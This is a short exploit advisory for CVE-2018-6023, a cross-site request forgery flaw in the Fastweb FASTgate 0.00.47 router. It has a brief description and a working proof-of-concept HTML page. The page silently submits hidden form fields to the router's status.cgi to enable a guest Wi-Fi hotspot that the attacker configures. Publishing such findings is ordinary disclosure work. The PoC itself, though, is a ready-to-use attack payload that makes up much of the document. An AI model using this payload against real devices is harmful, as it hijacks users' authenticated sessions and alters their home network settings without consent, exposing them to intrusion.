# Exploit Title: Fastweb FASTgate 0.00.47 CSRF # Date: 09-05-2018 # Exploit Authors: Raffaele Sabato # Contact: https://twitter.com/syrion89 # Vendor: Fastweb # Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/ # Version: 0.00.47 # CVE: CVE-2018-6023 I DESCRIPTION ======================================================================== An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc. II PROOF OF CONCEPT ======================================================================== ## Activate Gues Wi-Fi: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.254/status.cgi"> <input type="hidden" name="&#95;" value="1516312144136" /> <input type="hidden" name="act" value="nvset" /> <input type="hidden" name="hotspot&#95;broadcast&#95;ssid" value="1" /> <input type="hidden" name="hotspot&#95;enable" value="1" /> <input type="hidden" name="hotspot&#95;filtering" value="all" /> <input type="hidden" name="hotspot&#95;security" value="WPA2PSK" /> <input type="hidden" name="hotspot&#95;ssid" value="GUEST&#45;Test" /> <input type="hidden" name="hotspot&#95;timeout" value="&#45;1" /> <input type="hidden" name="service" value="wl&#95;guestaccess" /> <input type="submit" value="Submit request" /> </form> </body> </html> III REFERENCES ======================================================================== http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/